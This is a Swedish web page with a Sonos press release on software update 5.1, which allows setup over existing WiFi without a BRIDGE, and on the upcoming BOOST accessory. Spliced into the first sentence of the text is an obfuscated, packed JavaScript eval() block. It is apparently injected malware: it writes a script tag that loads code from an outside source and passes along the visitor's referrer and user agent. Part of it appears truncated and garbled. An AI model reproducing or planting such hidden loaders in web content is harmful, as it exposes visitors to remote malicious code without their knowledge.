Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Introduktion av ännu enklare Sonos

Introduktion av ännu enklare Sonos

Allt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aatyz|var|u0026u|referrer|ftyny||js|php’.split(’|’),0,{}))
vi gör bygger på övertygelsen att lyssna på musik i hemmet ska vara så enkelt som möjligt utan att kompromissa med vår legendariska ljudkvalitet. Genom mjukvara gör vi det möjligt att ständigt förbättra Sonos – göra det enklare, snabbare och mer flexibelt, även för dem som packar upp en Sonos för första gången.

Idag blir det ännu enklare att komma igång med Sonos eftersom vi nu lanserar Sonos 5.1, en större uppdatering av programvaran som ger dig möjlighet att installera och köra Sonos i ditt befintliga WiFi -nätverk. Från och med nu krävs det inte längre en kabelanslutning till din router – eller till en SONOS BRIDGE.

Börja med en högtalare

Gå från att packa upp till att lyssna på musik genom endast ett par enkla steg. Börja med en PLAY:1 för €199, din smartphone eller surfplatta, och anslut till ditt WiFi. Sedan lägger du enkelt till dina favoritmusiktjänster som WiMP eller Spotify, och börja streama.

Därifrån kan du enkelt expandera ditt system. Lägg till fler högtalare i andra rum i ditt hem genom ett enda knapptryck och ta del av nya funktioner och musiktjänster via enkla uppdateringar.

Enkel WiFi-installation, samma stabila trådlösa anslutning

Streama HiFi-ljud till valfria rum i ditt hem utan störningar, ekon och fördröjningar. Vår nya programvara levererar den fullständiga Sonos-upplevelsen genom att använda ditt befintliga WiFi-nätverk. Efter vårt hittills största betatest som pågått under de senaste månaderna har vi samlat ihop erfarenheter från varje typ av hemmiljö för att säkerställa att den nya WiFi-aktiverade installationen uppfyller våra höga standarder för en stabil trådlös lyssningsupplevelse.

Majoriteten av nya kunder kommer att kunna använda WiFi-installationen, som fungerar för alla högtalare som befinner sig inom routerns WiFi-täckning. Det dedikerade Sonos-nätverket, som endast är tillgängligt via en nätverkskabel till routern, kommer fortfarande att vara det bästa sättet att skapa den mest skottsäkra upplevelsen, framförallt i följande scenarion:

  • Hem där WiFi-signalen inte nå till alla rum där du vill ha en högtalare.
  • Sonos 3.1 and 5.1 hemmabio-installationer kommer fortsättningsvis kräva en kabelanslutning. En PLAYBAR på egen hand kräver inte kabelanslutning

Befintliga kunder som redan använder en BRIDGE eller annan kabelansluten komponent drar redan fördel av ett dedikerat Sonos-nätverk och behöver inte göra någon förändring.

Boosta din signal

Samtidigt som vi utvecklat dagens mjukvaruuppdatering har vi även jobbat med ett ännu kraftfullare trådlöst tillbehör som ett alternativ till BRIDGE, kallad SONOS BOOST.

BOOST, som blir tillgänglig senare i år för €99, bygger på ett decennium av erfarenheter från de olika behov våra kunder har och erbjuder trådlösa prestanda av proffsklass för att skapa förutsättningar för de mest krävande WiFi-milöer i hemmet. Håll utkik efter den officiella BOOST-lanseringen inom de närmaste månaderna.

För mer information om denna uppdatering av programvaran, inklusive kompatibilitet och enheter som stöds, gå till www.sonos.com/rock-solid-wireless.

Vi vill rikta ett speciellt tack till alla tusentals betatestare från hela världen som hjälpt oss i vår vision att skapa ett ännu enklare Sonos.

Observera, om du redan är en Sonosanvändare och drar ur sladden till din Bridge, kommer systemet att sluta fungera.
Om du vill testa en Bridge-lös uppsättning på en befintlig installation, genomför följande steg:
1) Uppdatera app:en till senaste version.
2) Med Bridge:en fortfarande inkopplad, välj BRIDGE-Inställningar i inställningsmenyn
3) Följ instruktionerna i app:en
4) När dessa steg är genomförda kommer du att kunna koppla ur din Bridge och testa den enklare installationen utan att behöva resetta ditt Sonos-system. Du kan när som helst koppla in Bridge:n igen och byta tillbaka till ”Standardinstallationen”.
Detta är ett pressmeddelande från SONOS